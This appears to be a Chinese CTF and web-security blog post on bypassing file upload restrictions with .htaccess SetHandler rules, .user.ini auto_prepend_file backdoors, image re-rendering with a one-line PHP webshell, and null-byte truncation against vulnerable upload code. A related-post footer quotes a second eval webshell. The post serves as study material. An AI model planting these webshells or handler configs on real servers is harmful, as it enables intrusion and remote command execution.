文件上传漏洞 续

已于 2022-12-10 23:00:41 修改
阅读量1.8k 收藏 7
点赞数
分类专栏: 安全渗透 CTF 文章标签: 安全 web安全
于 2022-06-18 17:36:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64118193/article/details/125349199
版权

目录

文件上传-.hatacess

文件上传-user.ini

文件上传-二次渲染

00截断介绍

1.白名单绕过 00截断(GET注入)

2.白名单绕过 00截断(POST注入)

文件上传-.hatacess

.hatacess(伪静态文件)文件时Apache服务中的一个配置文件,它负责相关目录下的网页配置。通过htacess文件。可以帮助我们实现:网页301重定向,自定义404报错,改变文件扩展名,允许,阻止特定的用户或目录的访问,禁止目录列表,配置默认文档等功能.hatacess默认不支持nginx,设置后支持。

上传模块中,黑名单过滤了所有能执行的后缀名,如果上传.htacess。htacess文件的作用时可以帮助我们实现包括:文件夹密码保护,用户自动重定向,自定义错误界面,改变你的文件扩展名,封禁特定的IP地址,禁止目录列表,以及使用其他文件作为index文件等一些功能。在htacess里写入色图Handlerapplication/x-httpd-http则可以重写成php文件。要htacess规则生效需要在apache开启rewrite重写模块,因为apache里多数都开启这个模块。所有规则一般都生效

<FilesMatch  "22.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
第二行自动读写为php文件
上传htacess文件,会将22.jpg文件自动解析为php文件
<Directory />
Options FollowSymLinks
AllowOverride All
</Directory>

文件上传-user.ini

php.ini是php是php的一个全局配置文件,对整个web服务起作用;而.user.ini(是防止脚本跨根目录执行的不是防止ftp)和htacess一样是目录配置文件,.user.ini就是用户自定义的一个php.ini,我们可以用这个文件来构造后门和隐藏后门。

让所有当前目录下可执行php文件 包含22.jpg文件

auto_prepend_file=22.jpg

文件上传-二次渲染

在我们上传文件后,网站会对图片进行二次处理(格式,尺寸,保存,删除,要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行战术

绕过方法:

1.配合条件竞争漏洞

竞争条件是指多个线程在没有进行锁操作或同步操作的情况下同时访问同一个共享代码,变量,文件等,运行的结果依赖于不用的线程访问数据的顺序

2.配合文件包含漏洞

将一句话木马插入到网站二次处理后的图片中,也就是将二次渲染后保留的图片和一句话木马制作为图片马,再配合文件包含漏洞解析图片马中的代码,获取webshell。

<?$_GET[0]($_POST[1];)?>
0=system
1=tac  flag.php

00截断介绍

00截断,url中%00表示ASCII中的0,而ascii中的0当作特殊字符保留,表示字符串结束,所以url中出现%00表示读取已结束

**满足条件:(1)PHP版本<5.3.4   (2)配置参数magic_quotes_gpc呈关闭状态

1.白名单绕过 00截断(GET注入)

 $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

$_GET['save_path']上传文件,后面使用 %00截断

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

白名单有png,上传png文件,使用Burpsuite进行抓包,进行如下操作,关闭代理即可上传成功

上传图片后 复制图片链接,删除后面多余的部分就是我们需要的URL地址,使用蚁剑进行连接,进行提权

2.白名单绕过 00截断(POST注入)

 $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

$_POST['save_path']上传文件,后面使用 0x00截断(Hex16进制)

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

 白名单有png,上传png文件,使用Burpsuite进行抓包,进行如下操作,关闭代理即可上传成功

K.A.L
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
28-4 文件上传漏洞 - %00和00截断
weixin_43263566的博客
03-19 182
查看源码发现是白名单绕过,只允许 jpg、png、gif 格式的文件。先正常的上传一个php文件,然后使用bp抓包之后改包。改完配置后记得重启服务器使配置生效。PHP版本低于5.3.4。在php.ini中,参数需要设置为OFF。
文件上传漏洞-04】文件上传路径截断靶场实战
cc
02-16 5419
在http请求中,我们发现了"save_path",顾名思义就是文件上传的路径,也可以影响文件存储路径,而根据响应的文件路径,可以发现服务器对上传的文件进行了重命名。服务器后台采用的是move_uploaded_file()函数将上传的文件移动到新位置也就是文件另存,函数在执行的时候会有两个参数,第一个参数就是原文件的路径,第二个参数就是目标函数的路径,这两个路径都是作为字符串来出现的;注意:在http请求中,存储路径可控,是可以采用00截断的一个条件,且采用00阶段是为了使上传的文件可执行。
文件上传漏洞总结
qq_51582652的博客
03-22 312
文件上传漏洞总结前端验证头部验证MIME验证黑名单验证Phtml绕过Htaccess绕过大小写绕过双写绕过特殊字符绕过构造后缀名绕过白名单验证0x00截断(1)[^1]0x00截断(2)图片马[^2]二次渲染条件竞争Waf检测Waf头部绕过Waf内容绕过总结 前端验证 可以利用开发者工具删除掉与脚本的事件。然后在上传恶意的代码。 一句话木马内容 <?php @eval($_POST['123']);?> 上传一句话木马之后利用菜刀进行连接 头部验证 MIME验证 概述:MIME验证:使客户
.htaccess使用详解
Neil
03-21 1773
<br />.htaccess是Apache服务器的一个非常强大的分布式配置文件,学会使用.htaccess,对虚拟主机用户来说,可以实现众多的功能。<br />.htaccess 其实并不难,我们可以把它认为它只是由一些简单命令或者用法说明组成的文本文件,不过它却能极大的提高站点的安全性。<br />1. 保护 .htaccess 自身的安全性<br />阻止用户通过读取和写入 .htaceess 来更改服务器安全性的设置。<br /><files .htaccess><br /><br /> orde
文件上传漏洞 — .user.ini绕过、后缀大小写绕过
liguangyao213的博客
02-16 3154
web渗透测试最全实战课程--渗透测试视频教程-信息安全-CSDN程序员研修院实战化课程,学完就挖SRC 学会更多实战技巧-https://edu.csdn.net/course/detail/32713 文件上传漏洞的相关讲解基于upload-labs靶场,搭建教程见文件上传漏洞靶机搭建教程 .user.ini绕过 浏览器访问http://127.0.0.1/Pass-05/index.php进入靶机pass05环境练习页面: (注意:该pass要求php版本大于等于5.3.0版本)
文件上传-00截断
weixin_45711977的博客
07-18 2433
文件上传-00截断
彩虹外链网盘V5.4更新 新增用户系统与分块上传
02-02
2.默认使用分块上传,解决大文件上传失败问题 3.上传前计算文件hash,支持极速秒传,新增文件完整性校验 4.云存储支持直接对接接口上传,无需本机中转,上传速度更快 5.云存储支持直接链接下载模式,下载速度更快 6....
Xxasp 网络硬盘 v3.3.2.rar
07-04
4、系统从程序底层防止上传漏洞,防止任何恶意脚本文件的上传,确保系统的安全。5、支持控件方式上传,显示上传进度,支持断线传,并提高上传速度6、用户间可共享文件,收藏喜爱的文件,用户可访问好友的共享空间7...
Xxasp网络硬盘.rar
07-05
4、系统从程序底层防止上传漏洞,防止任何恶意脚本文件的上传,确保系统的安全。 5、支持控件方式上传,显示上传进度,支持断线传,并提高上传速度 6、用户间可共享文件,收藏喜爱的文件,用户可访问好友的共享...
Xxasp网络硬盘 v3.11.rar
07-05
4、系统从程序底层防止上传漏洞,防止任何恶意脚本文件的上传,确保系统的安全。 5、支持控件方式上传,显示上传进度,支持断线传,并提高上传速度 6、用户间可共享文件,收藏喜爱的文件,用户可访问好友的共享...
文件上传】00截断详解
热门推荐
redwand的博客
02-03 1万+
00截断是操作系统层的漏洞,由于操作系统是C语言或汇编语言编写的,这两种语言在定义字符串时,都是以\0(即0x00)作为字符串的结尾。操作系统在识别字符串时,当读取到\0字符时,就认为读取到了一个字符串的结束符号。因此,我们可以通过修改数据包,插入\0字符的方式,达到字符串截断的目的。00截断通常用来绕过web软waf的白名单限制
网络安全进阶学习第五课——文件上传漏洞
p36273的博客
07-03 3692
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。getimagesize()函数会读取目标文件的16进制,验证目标文件16进制的头几个字符串是否符合图片的要求,通过此函数判断文件类型。通常在一个请求中,同样名称的参数只会出现一次,函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
文件上传之00截断分析
a21536545645的博客
08-12 3567
原理 php是基础c语言实现的,C语言中认为0x00是结束符号,文件上传之所以可以00截断,是因为白名单判断的时候是判断后缀,在进行路径拼接的时候用的其他值,然后在进行move_uploaded_file的时候,这个函数读取到hex值为00的字符,认为读取结束,出现00截断 例如上传图片1.png,filename为1.png,save_path为…/upload/1.php%00 我们看在代码层面会发生什么 1,取后缀名: $file_ext=png 后缀名在白名单中,符合 2,拼接上传
文件上传漏洞—%00截断,配合upload-labs-12和Burp Suite
qq_43660551的博客
11-08 2699
预备知识:在请求方法中,get方式会对url编码进行自动解码,但是post不会对url编码进行自动解码。所以,在数据包以post方式提交时,要先将url编码进行解码,然后再提交。 查看下本关的源码。不难发现,本关使用白名单,只允许上传jpg、png、gif格式的文件。 源码中move_upload_file将文件上传到img_path的路径中,而img_path路径是save_path加上随机数时间戳+ “.” + 后缀名。这里save_path可以在数据包中修改。 ...
%00截断在文件上传漏洞中的妙用
最新发布
weixin_52796034的博客
08-24 1286
%00截断的原理:0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。 系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。
00截断上传绕过_关于上传中的00截断分析
weixin_39922929的博客
12-20 588
关于上传中00截断的细节,很多朋友在渗透中都会发现一些这样的有趣现象,这个站点使用00截断上传的方法上传成功了,而换一个站点又失败了,这是什么原因呢?你看了这篇文章就会明白。00截断原理0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。00截断的限制条件1PHP<5.3.29,且GPC关闭00截断的利用方法上传文...
文件上传漏洞——.user.ini与.htaccess
zhhhb1005的博客
07-18 860
htaccess文件(“分布式配置文件”)提供了针对目录改变配置的方法,即,在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令将受到限制。管理员可以通过Apache的AllowOverride指令来设置。概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现重新解析规则绕过黑名单。...
文件上传漏洞】user.ini留后门
weixin_53146913的博客
05-18 3982
一、什么是.user.ini? php.ini是php默认的配置文件。其中包含四种配置, 在PHP_INI_USER的配置项中,提到.user.ini。 这里作用解释如下: 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 .user.ini 是PHP 支持基于每个目录的 I
文件上传漏洞 找绝对路径
07-27
文件上传漏洞是指在网站或应用程序中存在漏洞,使得攻击者可以上传恶意文件到服务器上。通过利用文件上传漏洞,攻击者可以执行任意代码,获取服务器权限,或者在服务器上执行其他恶意操作。 要找到文件上传漏洞的绝对路径,可以通过以下步骤进行: 1. 首先,尝试上传一个文件,观察上传的文件是否被服务器接受并保存。如果上传成功,可以尝试修改文件的扩展名或内容,以绕过服务器的文件类型检查。这样可以确保上传的文件能够被服务器执行。 2. 上传成功后,需要找到上传文件的绝对路径。可以通过查看上传文件的URL或文件路径来获取。通常,上传的文件会被保存在服务器的特定目录中,可以通过查看服务器配置文件或应用程序代码来确定上传文件的保存路径。 3. 一旦找到上传文件的绝对路径,可以使用蚁剑等工具来连接服务器并执行代码。通过连接服务器,可以利用上传的文件执行任意代码,获取服务器权限或进行其他操作。 需要注意的是,为了使上传的文件能够被服务器执行,通常需要将文件的扩展名修改为服务器支持的脚本语言类型,如PHP。这样服务器在执行文件时会将其作为脚本来解析并执行其中的代码。 总结起来,要找到文件上传漏洞的绝对路径,需要通过上传文件并修改扩展名或内容来绕过服务器的文件类型检查,然后查找上传文件的保存路径,并使用相应的工具连接服务器并执行代码。 #### 引用[.reference_title] - *1* *2* *3* [文件上传漏洞详解](https://blog.csdn.net/2301_76160896/article/details/131215650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

K.A.L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值